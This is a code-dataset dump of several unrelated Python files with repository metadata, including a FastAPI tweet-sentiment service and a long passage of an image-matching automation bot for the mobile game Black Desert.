] | null | null | null | jobs/blast/query2tree.py | OSC/pseudofun | fce05e37dcba713d2c3f622b295350cfdd46b9e1 | [
"CC-BY-4.0",
"MIT"
] | 7 | 2018-05-24T14:18:10.000Z | 2022-02-26T03:56:41.000Z | jobs/blast/query2tree.py | OSC/pseudofun | fce05e37dcba713d2c3f622b295350cfdd46b9e1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | #!/bin/python
import alignment_toolbox
import sys
alignment_toolbox.generate_tree(sys.argv[2],sys.argv[1], True, sys.argv[3]);
| 16.25 | 76 | 0.761538 | 21 | 130 | 4.571429 | 0.619048 | 0.21875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02521 | 0.084615 | 130 | 7 | 77 | 18.571429 | 0.781513 | 0.092308 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d6984892ef25dfbf9c1c281e89c74ebb6fa0cf56 | 158 | py | Python | chapter2/code/os module/platform_version.py | gabrielmahia/ushuhudAI | ee40c9822852f66c6111d1d485dc676b6da70677 | [
"MIT"
] | 74 | 2020-05-19T01:08:03.000Z | 2022-03-31T14:00:41.000Z | chapter2/code/os module/platform_version.py | gabrielmahia/ushuhudAI | ee40c9822852f66c6111d1d485dc676b6da70677 | [
"MIT"
] | 1 | 2021-06-04T06:08:21.000Z | 2021-06-04T06:08:21.000Z | chapter2/code/os module/platform_version.py | gabrielmahia/ushuhudAI | ee40c9822852f66c6111d1d485dc676b6da70677 | [
"MIT"
] | 47 | 2020-05-05T12:06:31.000Z | 2022-03-10T04:45:01.000Z | from platform import python_implementation, python_version_tuple
print(python_implementation())
for attribute in python_version_tuple():
print(attribute)
| 31.6 | 64 | 0.841772 | 19 | 158 | 6.684211 | 0.578947 | 0.314961 | 0.283465 | 0.362205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094937 | 158 | 4 | 65 | 39.5 | 0.888112 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d6a0cdd879873e62447a4e9dabd5d1fab47a6078 | 3,833 | py | Python | index.py | FrostGod/Twitter-Sentimental-Analysis | a186d955b1441bae6ec423a89d4c5779d6390d63 | [
"MIT"
] | null | null | null | index.py | FrostGod/Twitter-Sentimental-Analysis | a186d955b1441bae6ec423a89d4c5779d6390d63 | [
"MIT"
] | null | null | null | index.py | FrostGod/Twitter-Sentimental-Analysis | a186d955b1441bae6ec423a89d4c5779d6390d63 | [
"MIT"
] | null | null | null | from fastapi import FastAPI
import fetch_tweets as ft
import csv
import os
import json
app = FastAPI()
def make_json(csvFilePath, jsonFilePath, tweets):
data = {}
print("making json file")
with open(csvFilePath, encoding='utf-8') as csvf:
csvReader = csv.DictReader(csvf)
cnt = 0
for rows in csvReader:
key = cnt
temp = dict()
# print(tweets[cnt])
temp["tweet"] = tweets[cnt][1]
data[key] = rows
data[key].update(temp)
cnt += 1
with open(jsonFilePath, 'w', encoding='utf-8') as jsonf:
jsonf.write(json.dumps(data, indent=4))
@app.get("/topic/{Topic}")
def topic(Topic: str, models: str):
models = models.split(',')
print(models)
tweets = ft.get_tweets(Topic)
print(tweets)
filename = "new_tweets.csv"
with open(filename, 'w') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerows(tweets)
os.system("python3 ./code/preprocess.py new_tweets.csv")
if "bl" in models:
os.system("python3 ./code/baseline.py")
make_json('./baseline.csv', './bl.json', tweets)
with open('bl.json') as json_file:
data = json.load(json_file)
return data
if "svm" in models:
print("svm")
os.system("python3 ./code/svm.py")
make_json('./svm.csv', './svm.json', tweets)
with open('svm.json') as json_file:
data = json.load(json_file)
return data
if "dt" in models:
os.system("python3 ./code/decisiontree.py")
make_json('./decisiontree.csv', './dt.json', tweets)
with open('dt.json') as json_file:
data = json.load(json_file)
return data
if "rf" in models:
os.system("python3 ./code/randomforest.py")
make_json('./randomforest.csv', './rf.json', tweets)
with open('rf.json') as json_file:
data = json.load(json_file)
return data
if "nb" in models:
os.system("python3 ./code/naivebayes.py")
make_json('./naivebayes.csv', './nb.json', tweets)
with open('nb.json') as json_file:
data = json.load(json_file)
return data
@app.get("/tweet/{tweet}")
def topic(tweet: str, models: str):
print("hi")
models = models.split(',')
print(models)
# tweets = ft.get_tweets(Topic)
tweets = [[0, tweet]]
filename = "new_tweets.csv"
with open(filename, 'w') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerows(tweets)
os.system("python3 ./code/preprocess.py new_tweets.csv")
if "bl" in models:
os.system("python3 ./code/baseline.py")
make_json('./baseline.csv', './bl.json', tweets)
with open('bl.json') as json_file:
data = json.load(json_file)
return data
if "svm" in models:
os.system("python3 ./code/svm.py")
make_json('./svm.csv', './svm.json', tweets)
with open('svm.json') as json_file:
data = json.load(json_file)
return data
if "dt" in models:
os.system("python3 ./code/decisiontree.py")
make_json('./decisiontree.csv', './dt.json', tweets)
with open('dt.json') as json_file:
data = json.load(json_file)
return data
if "rf" in models:
os.system("python3 ./code/randomforest.py")
make_json('./randomforest.csv', './rf.json', tweets)
with open('rf.json') as json_file:
data = json.load(json_file)
return data
if "nb" in models:
os.system("python3 ./code/naivebayes.py")
make_json('./naivebayes.csv', './nb.json', tweets)
with open('nb.json') as json_file:
data = json.load(json_file)
return data
| 31.418033 | 60 | 0.573702 | 494 | 3,833 | 4.374494 | 0.147773 | 0.077742 | 0.083295 | 0.105507 | 0.769088 | 0.769088 | 0.769088 | 0.769088 | 0.769088 | 0.769088 | 0 | 0.006874 | 0.278894 | 3,833 | 121 | 61 | 31.677686 | 0.774964 | 0.012523 | 0 | 0.711538 | 0 | 0 | 0.20862 | 0.023268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028846 | false | 0 | 0.048077 | 0 | 0.173077 | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba38a47970de24cff91878efadc678361604b915 | 59 | py | Python | Modulo/ModulosPacotes.py | andrezzadede/Curso-de-Python-POO | 7b3f892b78271e53543451e2896da5e47e79f87f | [
"MIT"
] | null | null | null | Modulo/ModulosPacotes.py | andrezzadede/Curso-de-Python-POO | 7b3f892b78271e53543451e2896da5e47e79f87f | [
"MIT"
] | null | null | null | Modulo/ModulosPacotes.py | andrezzadede/Curso-de-Python-POO | 7b3f892b78271e53543451e2896da5e47e79f87f | [
"MIT"
] | null | null | null | import math
print(math.sqrt(25))
print(math.factorial(5)) | 11.8 | 24 | 0.745763 | 10 | 59 | 4.4 | 0.7 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.084746 | 59 | 5 | 24 | 11.8 | 0.759259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
ba900b5bb8f5ca791cb78f18eaa740d215e05412 | 23 | py | Python | csv2yaml/__init__.py | sepandhaghighi/csv2yaml | cbacd12cee3e6a168cef56a57f7aad77e934f3a2 | [
"MIT"
] | 12 | 2017-09-13T21:36:22.000Z | 2021-03-09T06:28:48.000Z | csv2yaml/__init__.py | sepandhaghighi/csv2yaml | cbacd12cee3e6a168cef56a57f7aad77e934f3a2 | [
"MIT"
] | 1 | 2019-07-03T07:16:39.000Z | 2019-07-03T07:16:39.000Z | csv2yaml/__init__.py | sepandhaghighi/csv2yaml | cbacd12cee3e6a168cef56a57f7aad77e934f3a2 | [
"MIT"
] | 2 | 2019-06-19T08:46:35.000Z | 2020-07-13T03:54:18.000Z | from .csv2yaml import * | 23 | 23 | 0.782609 | 3 | 23 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.130435 | 23 | 1 | 23 | 23 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
baa6847316fba96a12088e1b06bdbddcef8584a6 | 178,789 | py | Python | likeyoubot_blackdesert.py | dogfooter-master/dogfooter | e1e39375703fe3019af7976f97c44cf2cb7ca0fa | [
"MIT"
] | null | null | null | likeyoubot_blackdesert.py | dogfooter-master/dogfooter | e1e39375703fe3019af7976f97c44cf2cb7ca0fa | [
"MIT"
] | null | null | null | likeyoubot_blackdesert.py | dogfooter-master/dogfooter | e1e39375703fe3019af7976f97c44cf2cb7ca0fa | [
"MIT"
] | null | null | null | import likeyoubot_game as lybgame
import likeyoubot_blackdesert_scene as lybscene
from likeyoubot_configure import LYBConstant as lybconstant
import time
import sys
import tkinter
from tkinter import ttk
from tkinter import font
import copy
class LYBBlackDesert(lybgame.LYBGame):
work_list = [
'게임 시작',
'로그인',
'메인 퀘스트',
'자동 사냥',
# '이야기',
'우편함',
'과제',
'길드',
'교감',
'말 가방에 넣기',
'말 가방 모두 꺼내기',
'낚시',
'투기장',
'인사하기',
'영지',
'영지로 이동',
'영지 나가기',
'마을로 이동',
'가축상점',
'교본상점',
'토벌 게시판',
'이벤트 보상 수령',
'캐릭터 변경',
'캐릭터 이동',
'도감',
'기술 성장',
'월드 보스',
'흑정령 - 흑정령 의뢰',
'흑정령 - 검은 기운',
'흑정령 - 잠재력 돌파',
'흑정령 - 수정 합성',
'흑정령 - 광원석 합성',
'반려동물 - 먹이주기',
'미궁 개척',
'미궁 목록',
'마우스 클릭',
'알림',
'[반복 시작]',
'[반복 종료]',
'[작업 대기]',
'[작업 예약]',
'' ]
nox_bd_icon_list = [
'nox_bd_icon',
'nox_bd_icon2',
'bd_icon3',
]
momo_bd_icon_list = [
'momo_bd_icon',
'momo_bd_icon2',
'bd_icon3',
]
potion_list = [
'소형',
'중형',
'대형'
]
box_range_list = [
'좁게',
'중간'
]
ddolmani_skill_list = [
"흑정령의 분노:흡수",
"흑정령의 분노I",
"흑정령의 분노II"
]
sell_pummok_list = [
"무기",
"방어구",
"장신구",
"수정",
"물약"
]
item_rank_list = [
"낡은",
"일반",
"고급",
"희귀",
"유일",
"전설",
"신화"
]
item_rank_color_list = [
"#7d7d86",
"#000000",
"#759460",
"#4880b6",
"#433e6f",
"#d49e4a",
"#de5f21"
]
character_move_list = [
"↑",
"↗",
"→",
"↘",
"↓",
"↙",
"←",
"↖"
]
sujeong_rank_list = [
'일반',
'고급',
'희귀',
'유일',
'전설']
geomun_rank_list = [
'낡은',
'일반',
'고급',
'희귀',
'유일',
'전설',
'신화',
'심연',
]
chejip_list = [
'야생 들풀',
'저마',
'목화 솜',
'누에고치',
'통나무',
'연한 원목',
'가벼운 원목',
'탄력있는 원목',
'거친 석재',
'구리 광석',
'철 광석',
'주석 광석',
'설정 안함'
]
chejip_place_list = [
'1 지역',
'2 지역',
'3 지역',
'4 지역'
]
jamjeryeok_dolpa_rank_list = [
'하급',
'중급',
'상급',
'최상급'
]
jamjeryeok_dolpa_rank_order_list = [
'낮은',
'높은'
]
npc_list = [
'잡화상점',
'가축상점',
'씨앗상점',
'교본상점',
]
migung_rank_op_list = [
'=',
'≥'
]
tobeol_boss_list = [
'빨간코',
'기아스',
'비겁한 베그',
'알 룬디',
'티티움',
'머스칸',
'오르그',
'켈카스',
'검은갈기',
'사우닐 공성대장',
'게아쿠',
'쿠베',
'우라카',
'헥세마리',
'카부아밀레스',
'사형 집행관',
'일레즈라의 하수인',
'엘릭 제사장',
]
tobeol_rank_list = [
'0',
'1',
'2',
'3',
'4',
'5',
'6',
'7',
'8',
'9',
'10'
]
muge_percentage_list = [
'70',
'80',
'90',
'100',
'110',
'120',
'130',
'140',
'150'
]
def __init__(self, game_name, game_data_name, window):
lybgame.LYBGame.__init__(self, lybconstant.LYB_GAME_BLACKDESERT, lybconstant.LYB_GAME_DATA_BLACKDESERT, window)
def process(self, window_image):
rc = super(LYBBlackDesert, self).process(window_image)
if rc < 0:
return rc
return rc
def custom_check(self, window_image, window_pixel):
# 여기서 더 있다 갈래 설정 필요
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
self.window_image,
self.resource_manager.pixel_box_dic['repeat_quest'],
custom_flag=1,
custom_rect=(240, 300, 280, 370)
)
if loc_x != -1:
c_match_rate = self.rateMatchedResource(self.window_pixels, 'migung_success_scene')
if c_match_rate > 0.9:
self.logger.warn('미궁 클리어')
return ''
c_match_rate = self.rateMatchedResource(self.window_pixels, 'migung_success_scene_repeat_confirm_event')
if c_match_rate > 0.9:
self.logger.warn('미궁 다시하기')
return ''
is_repeat_quest = self.get_scene('main_scene').get_game_config(lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean')
# 보정되지 않은 클릭을 하려면 이걸 써야 한다.
# self.telegram_send('반복 의뢰 인식됨')
# return -1
if is_repeat_quest == True:
self.logger.warn('반복 의뢰 계속하기: ' + str(match_rate))
self.window.mouse_click(self.hwnd, loc_x, loc_y)
else:
(n_loc_x, n_loc_y), n_match_rate = self.locationOnWindowPart(
self.window_image,
self.resource_manager.pixel_box_dic['next_quest'],
custom_flag=1,
custom_rect=(240, 300, 280, 370)
)
if n_loc_x != -1:
self.logger.warn('반복 의뢰 그만하기: ' + str(n_match_rate))
self.window.mouse_click(self.hwnd, n_loc_x, n_loc_y)
else:
self.logger.debug('next_quest not found: ' + str(n_match_rate))
self.window.mouse_click(self.hwnd, loc_x, loc_y)
return 'repeat'
# 마을에서 부활
# (loc_x, loc_y), match_rate = self.locationOnWindowPart(
# self.window_image,
# self.resource_manager.pixel_box_dic['buhwal_in_town'],
# custom_flag=1,
# custom_threshold=0.9,
# custom_rect=(350, 200, 400, 300)
# )
# if loc_x != -1:
# self.logger.warn('마을에서 부활: ' + str(match_rate))
# self.window.mouse_click(self.hwnd, loc_x, loc_y)
# return 'buhwal_in_town'
# 녹색 느낌표 인식
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
self.window_image,
self.resource_manager.pixel_box_dic['green_quest'],
custom_flag=1,
custom_threshold=0.99,
custom_rect=(240, 300, 280, 370)
)
if loc_x != -1:
self.logger.warn('녹색 느낌표 퀘스트: ' + str(match_rate))
self.window.mouse_click(self.hwnd, loc_x, loc_y)
return 'green_quest'
match_rate = self.rateMatchedResource(self.window_pixels, 'world_boss_success_scene')
if match_rate > 0.9:
return ''
match_rate = self.rateMatchedPixelBox(self.window_pixels, "main_scene_moving", custom_top_level=255, custom_below_level=180)
if match_rate > 0.9:
return ''
if not 'skip_event' in self.event_limit:
self.event_limit['skip_event'] = time.time()
# skip_limit = int(self.get_game_config(lybconstant.LYB_GAME_YEOLHYUL, lybconstant.LYB_DO_STRING_SKIP_PERIOD))
skip_limit = 0
if self.main_scene != None and self.main_scene.current_work != None:
if self.main_scene.current_work == '토벌 게시판':
match_rate = self.rateMatchedResource(self.window_pixels, 'tobeol_skip_loc', custom_below_level=200,custom_top_level=255)
if match_rate > 0.99:
self.logger.warn('동영상 건너뛰기')
self.mouse_click('tobeol_skip')
return 'skip'
elif self.main_scene.current_work == '메인 퀘스트':
(loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
self.window_image,
'npc_conversation_skip_loc',
custom_threshold=0.9,
custom_flag=1,
custom_top_level=(255, 255, 255),
custom_below_level=(130, 130, 130),
custom_rect=(570, 100, 635, 130)
)
# self.logger.info('npc_conversation_skip_loc' + ' ' + str((loc_x, loc_y)) + ' ' + str(skip_match_rate))
if loc_x != -1:
if not 'npc_conversation_skip_loc' in self.event_limit:
self.event_limit['npc_conversation_skip_loc'] = 0
if time.time() - self.event_limit['npc_conversation_skip_loc'] > 5:
self.main_scene.lyb_mouse_click_location(loc_x, loc_y)
self.event_limit['npc_conversation_skip_loc'] = time.time()
return 'skip'
else:
return ''
(loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
self.window_image,
'tutorial_skip_loc',
custom_threshold=0.9,
custom_flag=1,
custom_rect=(570, 60, 610, 100)
)
if loc_x != -1:
if not 'tutorial_skip_loc' in self.event_limit:
self.event_limit['tutorial_skip_loc'] = 0
if time.time() - self.event_limit['tutorial_skip_loc'] > 10:
self.main_scene.lyb_mouse_click_location(loc_x, loc_y)
self.event_limit['tutorial_skip_loc'] = time.time()
return 'skip'
else:
return ''
(loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
self.window_image,
'tutorial_skip_loc',
custom_threshold=0.9,
custom_flag=1,
custom_rect=(30, 60, 70, 100)
)
if loc_x != -1:
if not 'tutorial_skip_loc' in self.event_limit:
self.event_limit['tutorial_skip_loc'] = 0
if time.time() - self.event_limit['tutorial_skip_loc'] > 10:
self.main_scene.lyb_mouse_click_location(loc_x, loc_y)
self.event_limit['tutorial_skip_loc'] = time.time()
return 'skip'
else:
return ''
if time.time() - self.event_limit['skip_event'] > skip_limit:
self.event_limit['skip_event'] = time.time()
skip_loc_list = [
'bottom_right_skip_loc',
'bottom_right_skip_2_loc',
'top_right_skip_loc',
]
s = time.time()
for each_loc in skip_loc_list:
if not each_loc in self.event_limit:
self.event_limit[each_loc] = time.time()
else:
# 건너뛰기 30초 안에 발생하는 것만 해당
if time.time() - self.event_limit[each_loc] > 30:
self.set_option(each_loc + '_repeat', None)
# self.event_limit[each_loc + '_count'] += 1
# adjust_level = int(self.get_game_config(lybconstant.LYB_GAME_TERA, lybconstant.LYB_DO_STRING_SKIP_LEVEL_ADJUST))
# adjust_threshold = int(self.get_game_config(lybconstant.LYB_GAME_YEOLHYUL, lybconstant.LYB_DO_STRING_YH_THRESHOLD_NEXT)) * 0.01
adjust_threshold = int(self.get_scene('main_scene').get_game_config(lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation')) * 0.01
# print('[DEBUG] adjust_threshold=', adjust_threshold)
# skip_match_rate = self.rateMatchedResource(
# window_pixel,
# each_loc,
# custom_below_level=adjust_level
# )
if each_loc == 'top_right_skip_loc':
each_rect = (500, 115, 535, 145)
elif each_loc == 'bottom_right_skip_loc':
each_rect = (580, 350, 610, 385)
elif each_loc == 'bottom_right_skip_2_loc':
each_rect = (380, 290, 535, 315)
(loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
self.window_image,
each_loc,
# custom_below_level=(100, 100, 100),
# custom_top_level=(255, 255, 255),
custom_threshold=adjust_threshold,
custom_flag=1,
custom_rect=each_rect
)
# self.logger.debug(str(skip_match_rate) + ':' + str(adjust_threshold))
if loc_x != -1:
self.event_limit[each_loc] = time.time()
if each_loc != 'bottom_right_skip_loc':
self.logger.debug('skip: ' + str(each_loc) + ':' + str((loc_x, loc_y)) +' '+ str(int(skip_match_rate * 100)) + '%')
if self.get_option(each_loc + '_repeat') == None:
self.set_option(each_loc + '_repeat', (loc_x, loc_y))
return ''
(last_loc_x, last_loc_y) = self.get_option(each_loc + '_repeat')
if last_loc_x == loc_x and last_loc_y == loc_y:
self.set_option(each_loc + '_repeat', None)
return ''
self.logger.debug('Clicked SKIP: ' + str(each_loc) + ':' + str((loc_x, loc_y)) +' '+ str(int(skip_match_rate * 100)) + '%')
self.set_option(each_loc + '_repeat', None)
self.mouse_click(each_loc.replace('_loc', '', 1) + '_0')
return 'skip'
else:
self.set_option(each_loc + '_repeat', None)
pass
# print('SKIP:', each_loc + ':' + str((loc_x, loc_y)) +' '+ str(int(skip_match_rate * 100)) + '%')
e = time.time()
# self.logger.debug('ElapsedTime SKIP: ' + str(round(e - s, 2)))
resource_name = 'download_patch_loc'
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
resource_name,
custom_threshold=0.9,
custom_flag=1,
custom_rect=(230, 120, 400, 180)
)
if loc_x != -1:
pb_name = 'download_patch_ok'
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
self.window_image,
self.resource_manager.pixel_box_dic[pb_name],
custom_flag=1,
custom_threshold=0.9,
custom_rect=(320, 250, 420, 320)
)
if loc_x != -1:
self.logger.warn('패치 다운로드: ' + str(match_rate))
self.window.mouse_click(self.hwnd, loc_x, loc_y)
return resource_name
return ''
def process_terminate_applications(self):
max_app_close_count = self.common_config[lybconstant.LYB_DO_STRING_CLOSE_APP_COUNT]
self.logger.debug('CloseMaxCount: ' + str(max_app_close_count))
if self.player_type == 'nox':
if self.terminate_status == 0:
# self.mouse_click_with_cursor(660, 350)
if self.side_hwnd == None:
self.logger.warn('녹스 사이드바 검색이 안되었기 때문에 종료 기능은 사용하지 못합니다.')
self.request_terminate = False
return
self.window.mouse_click(self.side_hwnd, 16, 320)
self.terminate_status += 1
elif self.terminate_status > 0 and self.terminate_status < max_app_close_count:
self.logger.info('녹스 앱들을 종료 중입니다.')
self.window.mouse_drag(self.hwnd, 320, 270, 0, 270, 0.5)
# self.window.mouse_click(self.hwnd, 630, 220, delay=2)
# time.sleep(2)
# self.window.mouse_click(self.hwnd, 550, 245)
self.terminate_status += 1
else:
self.terminate_status = 0
self.request_terminate = False
elif self.player_type == 'momo':
if self.terminate_status == 0:
self.window.mouse_click(self.parent_hwnd, 660, 355)
# self.move_mouse_location(660, 355)
self.terminate_status += 1
elif self.terminate_status > 0 and self.terminate_status < max_app_close_count:
self.logger.info('모모 앱들을 종료 중입니다.')
self.window.mouse_drag(self.hwnd, 320, 270, 0, 270, 0.5)
self.terminate_status += 1
else:
self.terminate_status = 0
self.request_terminate = False
def get_screen_by_location(self, window_image):
scene_name = self.scene_tutorial_gisul_screen(window_image)
if len(scene_name) > 0:
return scene_name
scene_name = self.scene_init_screen(window_image)
if len(scene_name) > 0:
return scene_name
# 순서 중요 !!
# scene_name = self.scene_event_and_reward_screen(window_image)
# if len(scene_name) > 0:
# return scene_name
# 순서 중요 !!
# scene_name = self.scene_immu_start_screen(window_image)
# if len(scene_name) > 0:
# return scene_name
# scene_name = self.scene_main_screen(window_image)
# if len(scene_name) > 0:
# return scene_name
scene_name = self.scene_death_screen(window_image)
if len(scene_name) > 0:
return scene_name
scene_name = self.scene_urewanryo_screen(window_image)
if len(scene_name) > 0:
return scene_name
# scene_name = self.scene_geomungiun_screen(window_image)
# if len(scene_name) > 0:
# return scene_name
scene_name = self.scene_jamjeryeok_jeonsu_screen(window_image)
if len(scene_name) > 0:
return scene_name
scene_name = self.scene_nejeongbo_screen(window_image)
if len(scene_name) > 0:
return scene_name
scene_name = self.scene_select_ure_screen(window_image)
if len(scene_name) > 0:
return scene_name
# scene_name = self.scene_hukjeongryoung_soksakim_screen(window_image)
# if len(scene_name) > 0:
# return scene_name
# return ''
scene_name = self.scene_google_play_account_select(window_image)
if len(scene_name) > 0:
return scene_name
scene_name = self.scene_jihwiso(window_image)
if len(scene_name) > 0:
return scene_name
return ''
# def scene_hukjeongryoung_soksakim_screen(self, window_image):
# match_rate = self.rateMatchedResource(self.window_pixels,
# 'hukjeongryoung_soksakim_scene_loc',
# custom_below_level=(150, 150, 150),
# custom_top_level=(255, 255, 255),
# custom_tolerance=50)
# if match_rate > 0.7:
# self.logger.info('hukjeongryoung_soksakim_scene: ' + str(match_rate))
# return 'hukjeongryoung_soksakim_scene'
# return ''
def scene_jihwiso(self, window_image):
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
'jihwiso_scene_loc',
custom_threshold=0.7,
custom_flag=1,
custom_rect=(450, 40, 540, 80)
)
if match_rate > 0.7:
self.logger.info('jihwiso_scene_loc: ' + str(match_rate))
return 'jihwiso_scene'
return ''
def scene_tutorial_gisul_screen(self, window_image):
match_rate = self.rateMatchedResource(self.window_pixels, 'tutorial_gisul_loc', custom_tolerance=50)
if match_rate > 0.7:
self.logger.info('tutorial_gisul_scene: ' + str(match_rate))
return 'tutorial_gisul_scene'
return ''
def scene_select_ure_screen(self, window_image):
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
'select_ure_scene_loc',
custom_threshold=0.7,
custom_flag=1,
custom_rect=(280, 50, 370, 150)
)
if match_rate > 0.7:
self.logger.info('select_ure_scene: ' + str(match_rate))
return 'select_ure_scene'
return ''
def scene_nejeongbo_screen(self, window_image):
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
'nejeongbo_scene_loc',
custom_threshold=0.7,
custom_flag=1,
custom_rect=(50, 35, 115, 60)
)
if match_rate > 0.7:
self.logger.info('nejeongbo_scene: ' + str(match_rate))
self.current_matched_scene['name'] = 'nejeongbo_scene_loc'
match_rate = self.rateMatchedResource(self.window_pixels, self.current_matched_scene['name'], weight_tolerance=self.weight_tolerance)
self.current_matched_scene['rate'] = int(match_rate * 100)
return 'nejeongbo_scene'
return ''
def scene_jamjeryeok_jeonsu_screen(self, window_image):
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
'jamjeryeok_jeonsu_scene_loc',
custom_threshold=0.7,
custom_flag=1,
custom_rect=(50, 35, 115, 60)
)
if match_rate > 0.7:
self.logger.info('jamjeryeok_jeonsu_scene: ' + str(match_rate))
self.current_matched_scene['name'] = 'jamjeryeok_jeonsu_scene_loc'
match_rate = self.rateMatchedResource(self.window_pixels, self.current_matched_scene['name'], weight_tolerance=self.weight_tolerance)
self.current_matched_scene['rate'] = int(match_rate * 100)
return 'jamjeryeok_jeonsu_scene'
return ''
# def scene_geomungiun_screen(self, window_image):
# (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
# self.window_image,
# 'geomungiun_scene_loc',
# custom_threshold=0.7,
# custom_flag=1,
# custom_rect=(50, 35, 115, 60)
# )
# if match_rate > 0.7:
# self.logger.info('geomungiun_scene: ' + str(match_rate))
# return 'geomungiun_scene'
# return ''
def scene_death_screen(self, window_image):
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
'death_scene_loc',
# custom_below_level=(130, 70, 60),
# custom_top_level=(230, 120, 90),
custom_threshold=0.7,
custom_flag=1,
custom_rect=(250, 170, 380, 200)
)
if match_rate > 0.7:
self.logger.info('death_scene: ' + str(match_rate))
return 'death_scene'
return ''
# def scene_immu_start_screen(self, window_image):
# (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
# self.window_image,
# 'immu_start_scene_loc',
# # custom_below_level=(200, 200, 200),
# # custom_top_level=(255,255,255),
# custom_threshold=0.7,
# custom_flag=1,
# custom_rect=(220, 120, 420, 145)
# )
# if match_rate > 0.7:
# self.logger.info('immu_start_scene: ' + str(match_rate))
# return 'immu_start_scene'
# return ''
# def scene_event_and_reward_screen(self, window_image):
# (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
# self.window_image,
# 'event_and_reward_scene_loc',
# # custom_below_level=(200, 200, 200),
# # custom_top_level=(255,255,255),
# custom_threshold=0.7,
# custom_flag=1,
# custom_rect=(260, 70, 380, 100)
# )
# if match_rate > 0.7:
# self.logger.info('event_and_reward_scene: ' + str(match_rate))
# return 'event_and_reward_scene'
# return ''
def scene_urewanryo_screen(self, window_image):
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
'urewanryo_scene_loc',
# custom_below_level=(200, 200, 200),
# custom_top_level=(255,255,255),
custom_threshold=0.7,
custom_flag=1,
custom_rect=(270, 100, 320, 200)
)
if match_rate > 0.7:
self.logger.info('urewanryo_scene: ' + str(match_rate))
return 'urewanryo_scene'
return ''
def scene_main_screen(self, window_image):
s = time.time()
(loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
self.window_image,
'main_scene_loc',
# custom_below_level=(200, 200, 200),
# custom_top_level=(255,255,255),
custom_threshold=0.7,
custom_flag=1,
custom_rect=(430, 30, 635, 60)
)
e = time.time()
self.logger.debug('ElapsedTime main_scene_loc: ' + str(round(e - s, 5)))
if match_rate > 0.7:
self.logger.debug('main scene: ' + str(match_rate))
self.current_matched_scene['name'] = 'main_scene_loc'
match_rate = self.rateMatchedResource(self.window_pixels, self.current_matched_scene['name'], weight_tolerance=self.weight_tolerance)
self.current_matched_scene['rate'] = int(match_rate * 100)
return 'main_scene'
return ''
def scene_init_screen(self, window_image):
loc_x = -1
loc_y = -1
if self.player_type == 'nox':
for each_icon in LYBBlackDesert.nox_bd_icon_list:
